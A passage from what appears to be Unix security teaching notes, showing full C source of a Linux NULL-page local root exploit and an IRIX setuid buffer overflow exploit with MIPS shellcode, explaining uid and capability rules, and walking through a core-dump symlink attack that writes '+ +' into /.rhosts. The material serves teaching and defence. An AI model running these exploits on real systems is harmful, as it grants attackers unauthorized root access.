    : "i" (~8191)
    );
    return (void *) curr;
}

static inline __attribute__((always_inline)) void exit_kernel()
{
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
        "i" (USER_CS), "r" (exit_code)
    );
}

void kernel_code()
{
    int i;
    uint *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    exit_kernel();
}

void exit_code()
{
    if (getuid() != 0) {
        fprintf(stderr, "failed\n");
        exit(-1);
    }

    execl("/bin/sh", "sh", "-i", NULL);
}

int main(void) {
    char template[] = "/tmp/padlina.XXXXXX";
    int fdin, fdout;
    void *page;

    uid = getuid();
    gid = getgid();
    setresuid(uid, uid, uid);
    setresgid(gid, gid, gid);

    if ((personality(0xffffffff)) != PER_SVR4) {
        if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
            perror("mmap");
            return -1;
        }
    } else {
        if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
            perror("mprotect");
            return -1;
        }
    }

    *(char *)0 = '\x90';
    *(char *)1 = '\xe9';
    *(unsigned long *)2 = (unsigned long)&kernel_code - 6;

    if ((fdin = mkstemp(template)) < 0) {
        perror("mkstemp");
        return -1;
    }

    if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
        perror("socket");
        return -1;
    }

    unlink(template);
    ftruncate(fdin, PAGE_SIZE);
    sendfile(fdout, fdin, NULL, PAGE_SIZE);
}
And indeed:
% gcc -o run run.c && gcc -o exploit exploit.c && ./run
padlina z lublina!
sh-3.00#
What happens? We have seen get_current(), exit_kernel(), kernel_code() and exit_code() in the vmsplice exploit above. As before, we somehow get the kernel to call kernel_code(), which sets uid and gid to 0 and gives us all capabilities, and then returns to exit_code() and starts a root shell.
The new part is that we store 0x90 (nop), 0xe9 (jump) and a value A at addresses 0, 1, and 2-5. The jump is relative, and the next instruction starts at address 6, so the jump goes to A+6, that is, to kernel_code. It remains to get the kernel to jump to address 0, where our code is waiting. And the sendfile() call causes the kernel to do
static ssize_t sock_sendpage(...)
{
    ...
    return sock->ops->sendpage(sock, page, offset, size, flags);
}
and for the PF_PPPOX protocol family that pointer is NULL.
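Finally, why the personality nonsense? In the SVR4 personality we have access to page 0. When a program is executed with this personality, the kernel maps page 0 for it, read-only. That is why exploit.c then only needs mprotect() to make that page writable. So run.c sets the personality and executes the actual exploit.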
Remotely logged in to some IRIX machine:

```
$ ./x 123.123.123.123:0
copyright LAST STAGE OF DELIRIUM jun 2003 poland //lsd-pl.net/
libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL

Warning: Color name "SGIVeryLightGrey" is not defined
# id
uid=100(aeb) gid=100(foo) euid=0(root)
```

where 123.123.123.123:0 points at the display of my home machine. A local root exploit. I did this in good script-kiddie style, before understanding what happened. But what happens?
The binary ./x was compiled from

```c
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/
/*## libdesktopicon.so $HOME #*/

#define NOPNUM 1300
#define ADRNUM 900
#define PCHNUM 400

char setreuidcode[]=
    "\x30\x0b\xff\xff"    /* andi    $t3,$zero,0xffff  */
    "\x24\x02\x04\x01"    /* li      $v0,1024+1        */
    "\x20\x42\xff\xff"    /* addi    $v0,$v0,-1        */
    "\x03\xff\xff\xcc"    /* syscall                   */
    "\x30\x44\xff\xff"    /* andi    $a0,$v0,0xffff    */
    "\x31\x65\xff\xff"    /* andi    $a1,$t3,0xffff    */
    "\x24\x02\x04\x64"    /* li      $v0,1124          */
    "\x03\xff\xff\xcc"    /* syscall                   */
;

char shellcode[]=
    "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode> */
    "\x24\x02\x03\xf3"    /* li      $v0,1011          */
    "\x23\xff\x01\x14"    /* addi    $ra,$ra,276       */
    "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248      */
    "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240      */
    "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)     */
    "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)   */
    "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)   */
    "\x03\xff\xff\xcc"    /* syscall                   */
    "/bin/sh"
;

char jump[]=
    "\x03\xa0\x10\x25"    /* move    $v0,$sp           */
    "\x03\xe0\x00\x08"    /* jr      $ra               */
;

char nop[]="\x24\x0f\x12\x34";

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland //lsd-pl.net/\n");
    printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 ");
    printf("IP:ALL\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552;

    envp[0]=buffer;
    envp[1]=0;

    b=buffer;
    sprintf(b,"HOME=");
    b+=5;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b=0;

    execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp);
}
```
It is clear that this is an exploit of /usr/sbin/printers, using a buffer overflow involving the HOME environment variable. And indeed, that program is setuid root, so we can expect profit from a buffer overflow:

```
# ls -l /usr/sbin/printers
-rwsr-xr-x 1 root sys 226356 Dec 7 2001 /usr/sbin/printers
# uname -R
6.5 6.5.14m
```
The authors explain some details of the assembler code. For more information on MIPS/IRIX, see Phrack 56#16. First of all, note that the code is big-endian, for use with IRIX.
The address of the shellcode is obtained using the bltzal $zero instruction. This instruction, Branch on Less Than Zero And Link, tests whether 0 is negative and branches if it is (it isn't). In either case it writes the return address of this conditional subroutine call, that is, the address shellcode+8, into the $ra register.
The li (load immediate) instruction that follows fills the branch delay slot. It is not a dummy: the $v0 register specifies which system call is done. Here 0x3f3 = 1011 is the execv system call. (System call numbers can be found on an IRIX machine in /usr/include/sys.s.)
In order to obtain the address of the /bin/sh string, which starts 28 bytes after the address in $ra, we first add 276 and then subtract 248. This is done in this convoluted way because directly adding 28 would involve a 16-bit operand with a zero byte (0x001c), which cannot be used in a string. The arguments for execv are completed by storing the address of the /bin/sh string and then a NULL pointer (together the argv array that $a1 points to), and finally a NUL byte terminating the /bin/sh string.
That explains the shellcode[] array. Concerning the setreuidcode[] array: 1024 is the getuid() system call, and 1124 is the setreuid() system call. (The value 1024 is loaded as 1025 minus 1, again to avoid a zero byte.) The effect is that we do setreuid(getuid(),0), which sets the effective user ID back to 0 - useful in case of a setuid executable that drops privileges but has a saved user ID that still remembers its former powers. (See also below.)
The peculiar invocations of jump[] read the value of the stack pointer: jump[] is called as a function that copies $sp into $v0, the return value register, and returns with jr $ra. That return jump needs some instruction to fill its delay slot, and conveniently the nop[] array follows.
We make an environment that consists only of the HOME= string. That string is filled with 900/4 copies of the address adr, 400/4 copies of the address pch, some padding for correct alignment, 1300/4 NOPs, and the exploit code. The addresses are not aligned in the array buffer, but will be aligned when returned by getenv("HOME").
It remains to explain the final details of the array overflow.
In a Unix-like environment each process has a real user ID (the ID of the user who started the program), an effective user ID (the ID of the user whose powers determine what the program is allowed to do), and a saved user ID (which remembers an earlier effective user ID).
Users can belong to groups, and each process has a real group ID, possibly some supplementary group IDs, an effective group ID, and a saved group ID.
The details are a real mess, and that means that there are lots of security problems with this setup.
A Unix user has a user ID (uid), a number that encodes his identity. The file /etc/passwd gives the correspondence between name and uid.
A Unix process has a (real) uid, usually inherited from its parent, that indicates which user is running the process. The user logged in, the login program gave her a shell with the appropriate uid, and this uid is inherited across forks.
Traditionally, root, the user with user ID 0, is all-powerful.
Sometimes a user needs to run a program that can do more than she can do herself. She plays a game, and the program must update the highscore list. She sends mail, and the program must update the mailbox of the recipient. She changes her password, and the password file must be updated. The powers of a program are determined by its effective user ID (euid). Normally the effective user ID equals the real user ID, that of the user who runs the program. But when the program binary has the setuid bit set in its mode, the real user ID of the executing program will still be that of the user (process) that started it, while the effective user ID will be that of the owner of the program binary. For example:
```
-rwsr-xr-x 1 root root 65008 2004-03-05 03:16 /bin/mount
```

Ordinary people can run /bin/mount and perhaps do things that require root permission. It is up to the program to find out what it is willing to do for that user.
Setuid root processes are a security problem because they can do everything, and have to be very careful not to be tricked by the user running them. In order to make life easier for the authors of such programs, POSIX introduced the saved effective user ID. A process can drop its privileges by setting its effective user ID to its real user ID, while the saved effective user ID remembers the previous value. Later, when it needs this power again, the process can set its effective user ID again to its saved effective user ID. Now large parts of the program code will run without any special powers and the risk of being tricked is decreased.
The saved effective user ID is set to the effective user ID directly after each exec.
(Note: "setuid" is often abbreviated "suid", but also "saved effective user ID" is abbreviated so.)
In order to make it easier for an NFS server to serve files to many different users, Linux introduced the filesystem user ID (fsuid). It is usually equal to the effective user ID, but an NFS server that runs with effective user ID 0 (root) can set its fsuid to that of the user who asks for a file. See setfsuid(2).
An all-powerful user root leads to problems. People have tried to split the root power into many different capabilities. See capset(2). The capability system is not used very much. Often it turns out that if one gives someone part of root's power, this can be used to obtain full root power. But the capability system exists, and while it was meant to make it possible to set up a more secure system, so far it has mostly resulted in more insecurity.
The problem is that not many programmers know about capabilities. The details are badly documented. And a hacker can abuse the capability system and start a setuid root program in such a way that it lacks some capabilities. Now some of its actions will unexpectedly fail. For example, it may be that its attempt to drop privileges will fail. (Sendmail local root exploit, June 2000, Linux 2.2.15, fixed in 2.2.16.)
These details are for recent Linux systems. Note that details have changed a lot over time, and also are a bit different on other Unix-type systems like *BSD, Solaris, etc.
There are of course many more details. Read the source.
(There are 16-bit and 32-bit versions of these calls, and conversions between them. Calls like setuid() may fail when the maximum number of processes for the target user has been reached. Etc.)
The values of ruid, euid, suid, fsuid and CAP_SETUID are inherited across forks. Upon an exec(), ruid is preserved. If the executed file has the setuid bit set and its filesystem was not mounted NOSUID, euid is set to the owner ID of the file; otherwise euid is preserved. Finally, suid and fsuid are set to euid.
The MS_NOSUID flag specified for a mount determines whether setuid and setgid bits are honoured by execve().
If the invoker has CAP_SETUID, then the call setuid(u) sets all of ruid, euid, fsuid and suid to u. Otherwise this call fails if u is not one of ruid, suid, and otherwise sets euid and fsuid to u.
The call seteuid(e) sets euid (and fsuid) to e. It will fail unless the invoker has CAP_SETUID or e is one of ruid, euid, suid.
The call setreuid(r,e) sets ruid, euid to r,e, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or r is one of -1, ruid, euid and e is one of -1, ruid, euid, suid. If r was not -1, or e was not -1 and not the old ruid, then suid is set to the new euid. Finally fsuid is made equal to the new euid.
The call setresuid(r,e,s) sets ruid, euid, suid to r,e,s, respectively, or leaves them unchanged when the corresponding parameter is -1. This call will fail unless the process has the CAP_SETUID capability or each of r,e,s is equal to one of -1, ruid, euid, suid.
There is a set of possible permissions (for a list, see capabilities(7)), and subsets of it are indicated by bitmasks. There is cap_effective, the set of presently enabled capabilities, cap_permitted, the set of capabilities that this process can enable, and cap_inheritable, the set of capabilities that can be preserved across an execve(). Normally, an ordinary process has none of these capabilities, and root has all of them. The system calls are capget(2) and capset(2).
If a process changes from being root (in the weak sense that at least one of ruid, euid, suid is zero) to being non-root (ruid, euid, suid all nonzero), then by default all capabilities are dropped. However, each process has a "keep capabilities" flag, and if that is set, capabilities are not dropped upon becoming non-root. The call prctl(PR_SET_KEEPCAPS,b); (where b is either 0 or 1) sets this "keep capabilities" flag to b.
CAP_SETUID is the capability checked by the system calls setuid(), setreuid(), setresuid() and setfsuid(). It allows a process to change user IDs arbitrarily. There is also a corresponding CAP_SETGID.
One can run a setuid binary in a modified environment, presenting conditions it was not programmed to handle.
Most programs expect file descriptors 0, 1, 2 (stdin, stdout, stderr) to be suitable for reading, writing, and writing error messages. But if the invoker of a setuid binary closes for example file descriptor 2 before the exec, then the first file opened by this binary will get file descriptor 2, and a later error message is written to this file.
Most programs expect argv[0] to contain the name that was used to invoke them. But the invoker can make argv[0] an arbitrary string. (This is also used legitimately - for example, for the shell a leading '-' in argv[0] used to be an indicator that this shell was a login shell.) But if a naive program, like sendmail, re-execs itself with execv(argv[0],argv), then we have a local root exploit (1996).
Create some very large files so that the disk is full or very nearly full. Not many programs handle the disk full situation well. Output files may be truncated. Programs may crash.
(Filling up a disk can also be a way to make sure that what you do afterwards will not be logged by syslog.)
It may be possible to cause a remote disk full condition. A good compressor will compress a very large constant file (say 20 GB of NULs) to something rather small. Send it as an attachment to a letter. Watch the receiver's anti-virus software unpack it. Some anti-virus software now detects precisely this: a very large file of NULs. But then a very large and very compressible file with some other content works.
Similarly, not many programs expect a stack overflow. But ulimit -s 100; foo starts the program foo in an environment with a very small stack (100 KiB). Probably it will segfault. Let us try.
```
% ulimit -s 100; mount /zip
% umount /zip
% ulimit -s 10; mount /zip
Segmentation fault
```

Sometimes it is possible to exploit the messy half-finished situation that is left behind when a program segfaults halfway.
There are other resource limits one can play with. Read bash(1), ulimit(3), getrlimit(2), setrlimit(2), sysconf(3).
One cannot send signals from unprivileged to privileged processes.
(Indeed, the standard says: For a process to have permission to send a signal to a process designated by pid, unless the sending process has appropriate privileges, the real or effective user ID of the sending process shall match the real or saved set-user-ID of the receiving process.)
But an unprivileged process can set up an alarm signal to be sent after a prespecified time, and then fork off the setuid binary. Maybe it is killed in the middle of what it was doing, leaving an exploitable messy situation.
Often, core dump files have a predictable name, sometimes just core. If one plans to make a setuid program dump core, it may be useful to have a link or symlink named core in the directory where core will be dumped. Sometimes one can overwrite an arbitrary file in this way.
For example, the following exploit for Digital Unix 4.0 was found by rusty@mad.it and soren@atlink.it.
```
$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
$ rlogin localhost -l root
```

That is, here core is made a symlink to /.rhosts, and by defining a suitable environment variable we make sure that the core file will contain a given string, here one that gives universal entrance permission (the line + + admits any user from any host). Then we kill the setuid binary with a signal that causes a core dump.
There have been many exploits in this direction. A secure system must not allow core dumps of setuid binaries, or of execute-only binaries (perhaps they have embedded passwords that should not become readable), or core dumps to a symlink.
The current Linux kernel has a per-process flag dumpable. One can test (and change) its value from user space using the prctl() system call.
Exercise
Under precisely what conditions will dumpable be set under the 2.6.0 kernel?